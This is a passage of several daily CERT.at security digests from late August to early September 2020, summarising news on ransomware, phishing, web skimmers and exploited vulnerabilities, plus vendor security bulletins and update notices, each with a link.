https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: Cross Site Scripting vulnerabilities in jQuery might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-7656, CVE-2020-11022, CVE-2020-11023 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Enterprise Content Management System Monitor is affected by a vulnerability in IBM® SDK Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-enterprise-content-manage…
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4516 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-aspera-shares-1-9-14-…
∗∗∗ Security Bulletin: Java Quarterly CPU affecting Watson Knowledge Catalog for IBM Cloud Pak for Data ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-java-quarterly-cpu-affect…
∗∗∗ Nagios Enterprises Nagios XI: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0868
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 03-09-2020 18:00 − Friday 04-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ FBI: Thousands of orgs targeted by RDoS extortion campaign ∗∗∗
---------------------------------------------
The FBI warns US companies that thousands of organizations around the world, from various industry sectors, have been threatened with DDoS attacks within six days unless they pay a Bitcoin ransom.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-thousands-of-orgs-target…
∗∗∗ Phishing adds overlay on official company page to steal logins ∗∗∗
---------------------------------------------
A phishing campaign deployed recently at various businesses uses the company's home page to disguise the attack and trick potential victims into providing login credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/phishing-adds-overlay-on-off…
∗∗∗ A blast from the past - XXEncoded VB6.0 Trojan, (Fri, Sep 4th) ∗∗∗
---------------------------------------------
While going over what my e-mail malware quarantine caught during this week, I found a message which made me feel rather nostalgic. Among the usual maldocs, ZIPs and ACEs, there was also an e-mail carrying an XXE file in its attachment.
---------------------------------------------
https://isc.sans.edu/diary/rss/26538
∗∗∗ Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496 ∗∗∗
---------------------------------------------
We provide an analysis of CVE-2020-17496, proof of concept code to demonstrate the vulnerability and information on attacks we have observed.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2020-17496/
∗∗∗ Thanos Ransomware: Destructive Variant Targeting State-Run Organizations in the Middle East and North Africa ∗∗∗
---------------------------------------------
We observed a variant of the Thanos ransomware that attempted to overwrite the master boot record, a more destructive approach than previous versions.
---------------------------------------------
https://unit42.paloaltonetworks.com/thanos-ransomware/
∗∗∗ Firefox will add a new drive-by-download protection ∗∗∗
---------------------------------------------
Firefox will block automatic downloads initiated from sandboxed iframes -- the technology usually used for web embeds.
---------------------------------------------
https://www.zdnet.com/article/firefox-will-add-a-new-drive-by-download-prot…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (curl, dovecot, geary, httpd, lua, mysql-connector-java, and squid), Mageia (lua and lua5.3, sane, and squid), Oracle (dovecot), Scientific Linux (dovecot), SUSE (java-1_7_1-ibm, kernel, php5, and xorg-x11-server), and Ubuntu (firefox).
---------------------------------------------
https://lwn.net/Articles/830632/
∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting and server-side request forgery. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Apr 2020 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Oct 2019 CPU (CVE-2019-2964, CVE-2019-2989 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Netcool Agile Service Manager (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 02-09-2020 18:00 − Thursday 03-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Microsoft Defender can ironically be used to download malware ∗∗∗
---------------------------------------------
A recent update to Windows 10's Microsoft Defender antivirus solution ironically allows it to download malware and other files to a Windows computer.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-iron…
∗∗∗ Sandbox Evasion Using NTP, (Thu, Sep 3rd) ∗∗∗
---------------------------------------------
I'm still hunting for interesting (read: "malicious") Python samples. By reading my previous diaries, you know that I like to find how attackers implement obfuscation and evasion techniques. Like yesterday, I found a Python sample that creates a thread to run a malicious shellcode[1]. But before processing the shellcode, it performs suspicious network traffic: [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26534
∗∗∗ Salfram: Robbing the place without removing your name tag ∗∗∗
---------------------------------------------
By Holger Unterbrink and Edmund Brumaghin. Threat summary: Cisco Talos recently uncovered a series of email campaigns utilizing links to malicious documents hosted on legitimate file-sharing platforms to spread malware. The campaigns distributed various malware payloads including Gozi ISFB, ZLoader, SmokeLoader and AveMaria, among others. Ongoing campaigns are distributing various malware families using the same crypter.
---------------------------------------------
https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-re…
∗∗∗ Inter: The Magecart Skimming Tool Now on More than 1,500 Sites ∗∗∗
---------------------------------------------
Digital web skimming attacks continue to increase. By now, anyone running an e-commerce shop is aware of the dangers of groups like Magecart, which infect a website every 16 minutes. However, to truly understand these skimmer groups, you have to understand the tools of the trade. The Inter Skimmer kit is one of today's most common and widely used digital skimming solutions globally.
---------------------------------------------
https://www.riskiq.com/blog/external-threat-management/inter-skimmer/
∗∗∗ New Python-scripted trojan malware targets fintech companies ∗∗∗
---------------------------------------------
PyVil RAT is capable of keylogging, taking screenshots and more, and those behind it have gone to great lengths to keep it as far under the radar as possible.
---------------------------------------------
https://www.zdnet.com/article/new-python-scripted-trojan-malware-targets-fi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco security updates: Jabber + crafted message = malicious code ∗∗∗
---------------------------------------------
Cisco has released security updates for, among others, Jabber, IOS XR and Webex Meetings.
---------------------------------------------
https://heise.de/-4884609
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (asyncpg and uwsgi), Mageia (cairo), openSUSE (chromium, kernel, and postgresql10), Red Hat (dovecot and squid:4), SUSE (curl, java-1_7_0-ibm, java-1_7_1-ibm, java-1_8_0-ibm, kernel, libX11, php7, squid, and xorg-x11-server), and Ubuntu (apport, libx11, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04).
---------------------------------------------
https://lwn.net/Articles/830496/
∗∗∗ Backdoors left unpatched in MoFi routers ∗∗∗
---------------------------------------------
MoFi Network patched only six of ten reported vulnerabilities, leaving three hard-coded undocumented backdoor systems in place.
---------------------------------------------
https://www.zdnet.com/article/backdoors-left-unpatched-in-mofi-routers/
∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is impacted by vulnerabilities in MySQL. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Information exposure in HTML comments vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is vulnerable to social engineering attacks (CVE-2020-4337) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Hard-coded passwords vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Improper Restriction of Excessive Authentication Attempts vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Oracle MySQL vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Use of Broken or Risky Cryptographic Algorithm vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Use of Insufficiently Random Value vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 01-09-2020 18:00 − Wednesday 02-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Attackers abuse Google DNS over HTTPS to download malware ∗∗∗
---------------------------------------------
More details have emerged on a malware sample that uses Google DNS over HTTPS to retrieve the stage 2 malicious payload.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/attackers-abuse-google-dns-o…
∗∗∗ Exposed Windows Domain Controllers Used in CLDAP DDoS Attacks, (Tue, Sep 1st) ∗∗∗
---------------------------------------------
LDAP, like many UDP based protocols, has the ability to send responses that are larger than the request. With UDP not requiring any handshake before data is sent, these protocols make ideal amplifiers for reflective distributed denial of service attacks. Most commonly, these attacks abuse DNS and we have talked about this in the past. But LDAP is another protocol that is often abused.
---------------------------------------------
https://isc.sans.edu/diary/rss/26526
∗∗∗ Using assert() to Execute Malware in PHP 7 Environments ∗∗∗
---------------------------------------------
Initially released December 2015, PHP 7 introduced a multitude of performance and security improvements. Approximately 43.7% of websites across the web currently use PHP 7.x, making it an incredibly popular scripting language — which is likely why attackers are creating malware to target environments which leverage it. During a recent investigation, our team stumbled across some malicious code which is used to inject a .user.ini file into a PHP 7 environment and add zend.assertions = 1.
---------------------------------------------
https://blog.sucuri.net/2020/09/using-assert-to-execute-malware-php-7.html
∗∗∗ Cloud firewall management API SNAFU put 500k SonicWall customers at risk ∗∗∗
---------------------------------------------
TL;DR: I found an IDOR in SonicWall’s cloud management platform API. Any user could add themselves to any account at any organisation using it. Anyone could create a user account [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/cloud-firewall-management-api…
∗∗∗ Extortion e-mail with bomb threat sent out en masse ∗∗∗
---------------------------------------------
Beware of a fraudulent extortion e-mail: criminals are sending messages claiming that a bomb has been placed in the recipients' business premises. If the companies that received the messages do not pay 20,000 dollars in Bitcoin within 80 hours, the bomb is supposed to go off. The e-mail is pure fabrication and nothing needs to be paid!
---------------------------------------------
https://www.watchlist-internet.at/news/erpressungs-mail-mit-bombendrohung-m…
=====================
= Vulnerabilities =
=====================
∗∗∗ New Intel microcode updates for Windows 10 fix CPU hardware bugs ∗∗∗
---------------------------------------------
Microsoft has released a new batch of Intel microcode updates for Windows 10 2004, 1909, 1903, and older versions to fix hardware bugs in Intel CPUs.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/new-intel-microcode-updates…
∗∗∗ Magento Sites Vulnerable to RCE Stemming From Magmi Plugin Flaws ∗∗∗
---------------------------------------------
Two flaws - one of them yet to be fixed - are afflicting a third-party plugin used by Magento e-commerce websites.
---------------------------------------------
https://threatpost.com/magento-sites-vulnerable-to-rce-stemming-from-magmi-…
∗∗∗ Encryption: TLS 1.3 faux pas endangers embedded systems using wolfSSL ∗∗∗
---------------------------------------------
For security reasons, admins should update the TLS library wolfSSL to the current version.
---------------------------------------------
https://heise.de/-4883741
∗∗∗ TYPO3-EXT-SA-2020-017: Multiple vulnerabilities in extension "Event management and registration" (sf_event_mgt) ∗∗∗
---------------------------------------------
It has been discovered that the extension "Event management and registration" (sf_event_mgt) is susceptible to Information Disclosure and Broken Access Control.
---------------------------------------------
https://typo3.org/security/advisory/typo3-ext-sa-2020-017
∗∗∗ TYPO3-EXT-SA-2020-016: Information Disclosure in extension "Localization Manager" (l10nmgr) ∗∗∗
---------------------------------------------
It has been discovered that the extension "Localization Manager" (l10nmgr) is susceptible to Information Disclosure.
---------------------------------------------
https://typo3.org/security/advisory/typo3-ext-sa-2020-016
∗∗∗ 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin ∗∗∗
---------------------------------------------
This morning, on September 1, 2020, the Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in File Manager, a WordPress plugin with over 700,000 active installations. This vulnerability allowed unauthenticated users to execute commands and upload malicious files on a target site. A patch was released this morning [...]
---------------------------------------------
https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-z…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (firefox), Mageia (mutt and putty), openSUSE (ldb, samba, libqt5-qtbase, opera, and postgresql10), Red Hat (bash, kernel, and libvncserver), SUSE (apache2, curl, and squid), and Ubuntu (ark, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, [...]
---------------------------------------------
https://lwn.net/Articles/830392/
∗∗∗ Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-re…
∗∗∗ Security Advisory - Command Injection Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-…
∗∗∗ Security Advisory - DoS Vulnerability in Some Huawei Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-…
∗∗∗ Security Advisory - Information Disclosure Vulnerability in Several Smartphones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-…
∗∗∗ Security Advisory - Remote Code Execution vulnerability in Apache Struts 2 ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-…
∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.9.0 ESR) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Cross-Site Scripting vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Spectrum Scale Transparent Cloud Tiering (177835) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c…
∗∗∗ Security Bulletin: Code injection vulnerability in IBM Spectrum Protect Operations Center (CVE-2020-4693) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-code-injection-vulnerabil…
∗∗∗ Security Bulletin: Information Disclosure vulnerability in IBM Spectrum Protect Server (CVE-2020-4591) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Use of Hard-Coded Credentials vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Spectrum Scale Transparent Cloud Tiering is affected by a Java vulnerability (CVE-2020-2654) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-scale-transp…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by OS Command Injection vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by OS Command Injection vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 31-08-2020 18:00 − Tuesday 01-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Hackers are backdooring QNAP NAS devices with 3-year old RCE bug ∗∗∗
---------------------------------------------
Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-are-backdooring-qnap…
∗∗∗ DLL Fixer leads to Cyrat Ransomware ∗∗∗
---------------------------------------------
A new ransomware uses an unusual symmetric encryption method named "Fernet". It is Python based and appends .CYRAT to encrypted files.
---------------------------------------------
https://feeds.feedblitz.com/~/634890360/0/gdatasecurityblog-en~DLL-Fixer-le…
∗∗∗ Notarized Mac malware: Apple apparently notarized trojans several times ∗∗∗
---------------------------------------------
Apple's notarization service is meant to protect Mac users from malware. Now the manufacturer has also notarized the notorious pest "Shlayer".
---------------------------------------------
https://heise.de/-4882770
∗∗∗ New web skimmer steals credit card data, sends to crooks via Telegram ∗∗∗
---------------------------------------------
Criminals steal payment data from online shoppers by abusing the Telegram instant messaging API, inserting credit card skimming code.
---------------------------------------------
https://blog.malwarebytes.com/web-threats/2020/09/web-skimmer-steals-credit…
∗∗∗ Quarterly Report: Incident Response trends in Summer 2020 ∗∗∗
---------------------------------------------
By David Liebenberg and Caitlin Huey. For the fifth quarter in a row, Cisco Talos Incident Response (CTIR) observed ransomware dominating the threat landscape. Infections involved a wide variety of malware families including Ryuk, Maze, LockBit, and Netwalker, among others. In a continuation of trends observed in last quarter’s report, these ransomware attacks have relied much less on commodity trojans such as Emotet and Trickbot.
---------------------------------------------
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.ht…
∗∗∗ Free iPhone 11 or Samsung Galaxy S20 from a Hofer survey? ∗∗∗
---------------------------------------------
Criminals are posing as Hofer and sending out e-mails at random claiming that your e-mail or IP address has been selected. You are therefore supposed to take part in a short survey and receive a free iPhone 11 or Samsung Galaxy S20 in return. Beware: the e-mail is not from Hofer, you will not receive a free smartphone, and you will end up in an expensive subscription trap!
---------------------------------------------
https://www.watchlist-internet.at/news/gratis-iphone-11-oder-samsung-galaxy…
∗∗∗ Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers ∗∗∗
---------------------------------------------
Our researchers analyzed data on cybersquatting to learn which domains attackers most often mimic and other key details of the practice.
---------------------------------------------
https://unit42.paloaltonetworks.com/cybersquatting/
∗∗∗ "Accessible Ubiquiti Service Discovery": Erster Datenfeed in der Taxonomie "Intrusions" ∗∗∗
---------------------------------------------
Ubiquiti devices use a discovery protocol to detect each other automatically. While this can be useful within one's own network, misconfigured devices make a wealth of data about themselves publicly retrievable. As if this problem were not enough, older firmware versions had a vulnerability that enabled (and may still enable) automated takeover of the affected systems.
---------------------------------------------
https://cert.at/de/blog/2020/9/accessible-ubiquiti-service-discovery-erster…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates: Trend Micro protection software can endanger PCs ∗∗∗
---------------------------------------------
There are important security patches for Trend Micro Apex One and OfficeScan XG.
---------------------------------------------
https://heise.de/-4883268
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (apache2 and libx11), Fedora (batik, ecj, eclipse, eclipse-cdt, eclipse-ecf, eclipse-emf, eclipse-gef, eclipse-m2e-core, eclipse-mpc, eclipse-mylyn, eclipse-remote, eclipse-webtools, firefox, httpd, jetty, lucene, selinux-policy, and univocity-parsers), Mageia (hylafax+), openSUSE (ark and chromium), Red Hat (virt:8.2 and virt-devel:8.2), SUSE (freeradius-server, freerdp, php7, php72, php74, and xorg-x11-server), and Ubuntu (freerdp2, keystone, [...]
---------------------------------------------
https://lwn.net/Articles/830278/
∗∗∗ QNAP NAS: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0857
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IBM Cloud Manager with OpenStack (CVE-2019-2949) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson-databind affect IBM Operations Analytics Predictive Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster…
∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson-databind affect IBM Operations Analytics Predictive Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster…
∗∗∗ Security Bulletin: IBM® Java™ SDK Technology Edition, Oct 2019, affects IBM Security Identity Manager Virtual Appliance ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-technology-e…
∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-…
∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson affect IBM Operations Analytics Predictive Insights (CVE-2019-14060, CVE-2019-14661, CVE-2019-14662) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff…
∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – Apache Thrift (CVE-2019-0205) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-usi…
∗∗∗ Security Bulletin: A vulnerability in IBM WebSphere Application Server (Liberty profile) affects IBM Operations Analytics Predictive Insights (CVE-2020-4329) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-we…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 28-08-2020 18:00 − Monday 31-08-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Emotet malware's new Red Dawn attachment is just as dangerous ∗∗∗
---------------------------------------------
The Emotet botnet has begun to use a new template for their malicious attachments, and it is just as dangerous as ever.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/emotet-malwares-new-red-dawn…
∗∗∗ Finding The Original Maldoc, (Sun, Aug 30th) ∗∗∗
---------------------------------------------
Xavier wrote about a "Malicious Excel Sheet with a NULL VT Score" and I showed how to extract the VBA code from the maldoc cleaned by AV.
---------------------------------------------
https://isc.sans.edu/diary/rss/26520
∗∗∗ Persistent WordPress User Injection ∗∗∗
---------------------------------------------
Our team recently stumbled across an interesting example of malicious code used to add an arbitrary user inside WordPress. The following code was detected at the bottom of the theme’s functions.php. It uses internal WordPress functions like wp_create_user() and add_role() to create a new user and elevate its role to “administrator:”
---------------------------------------------
https://blog.sucuri.net/2020/08/persistent-wordpress-user-injection.html
∗∗∗ It's Not Just an Unusual Login: Why Pay Attention to Threats Facing SaaS and Cloud? ∗∗∗
---------------------------------------------
There is a whole category of cyber-attacks largely untouched by the media. With breaking threat discoveries usually focused on targeted spear-phishing campaigns or widespread ransomware, cyber-attacks targeting cloud and SaaS are often overlooked.
---------------------------------------------
https://www.securityweek.com/its-not-just-unusual-login-why-pay-attention-t…
∗∗∗ Cisco warns of actively exploited IOS XR zero-day ∗∗∗
---------------------------------------------
Cisco said it discovered the attacks last week during a support case the company's support team was called in to investigate.
---------------------------------------------
https://www.zdnet.com/article/cisco-warns-of-actively-exploited-ios-xr-zero…
∗∗∗ Malware in game API ∗∗∗
---------------------------------------------
A JavaScript malware on the npm portal, a part of GitHub, pretended to be an interface to the party game "Fallguys: Ultimate Knockout".
---------------------------------------------
https://www.zdnet.de/88382359/malware-in-spiele-api/
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Slack Bug Allows Access to Private Channels, Conversations ∗∗∗
---------------------------------------------
The RCE bug affects versions below 4.4 of the Slack desktop app.
---------------------------------------------
https://threatpost.com/critical-slack-bug-access-private-channels-conversat…
∗∗∗ Cisco IOS XR Software DVMRP Memory Exhaustion Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust process memory of an affected device. The vulnerability is due to insufficient queue management for Internet Group Management Protocol (IGMP) packets. An attacker could exploit this vulnerability by sending crafted IGMP traffic to an affected device. A successful exploit could allow the attacker to cause memory exhaustion, [...]
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ IBM Security Bulletins ∗∗∗
---------------------------------------------
Released on 2020-08-28 and 2020-08-29.
---------------------------------------------
https://www.ibm.com/blogs/psirt/2020/08/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (bind9 and squid), Fedora (libX11 and wireshark), Gentoo (libX11 and redis), Mageia (firefox, libx11, qt4 and qt5base, and x11-server), openSUSE (gettext-runtime, inn, and webkit2gtk3), Oracle (firefox), SUSE (libqt5-qtbase, openvpn, openvpn-openssl1, postgresql10, and targetcli-fb), and Ubuntu (chrony, nss, and squid).
---------------------------------------------
https://lwn.net/Articles/829847/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (bacula, bind9, freerdp, libvncserver, lilypond, mupdf, ndpi, openexr, php-horde, php-horde-core, php-horde-gollem, php-horde-kronolith, ros-actionlib, thunderbird, and xorg-server), Fedora (golang-github-ulikunitz-xz and qt), Gentoo (bind, chrony, ghostscript-gpl, kleopatra, openjdk, and targetcli-fb), Mageia (ark, evolution-data-server, fossil, kernel, kernel-linus, and thunderbird), openSUSE (apache2, graphviz, grub2, inn, librepo, and [...]
---------------------------------------------
https://lwn.net/Articles/830137/
∗∗∗ Trend Micro Apex One: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0854
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 27-08-2020 18:00 − Friday 28-08-2020 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Paying without a PIN: researchers crack Visa's NFC payment function ∗∗∗
---------------------------------------------
Researchers paid contactlessly and without a PIN for products of practically any price using a Visa card.
---------------------------------------------
https://heise.de/-4881555
∗∗∗ Beware of fraudulent advertisements on Facebook, Instagram and Google! ∗∗∗
---------------------------------------------
Advertising lurks everywhere, trying to get us to buy a particular product or use a particular service. But not every advertisement is legitimate. Among the many legitimate advertisers there are, time and again, criminals too. This applies to social media just as much as to the ads that appear at the very top of a Google search. We show you what to look out for in order to unmask dubious advertisements!
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-vor-betruegerischen-werbeanz…
∗∗∗ Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning ∗∗∗
---------------------------------------------
Microsoft Defender ATP leverages AMSI’s visibility into scripts and harnesses the power of machine learning to detect and stop post-exploitation activities that largely rely on scripts.
---------------------------------------------
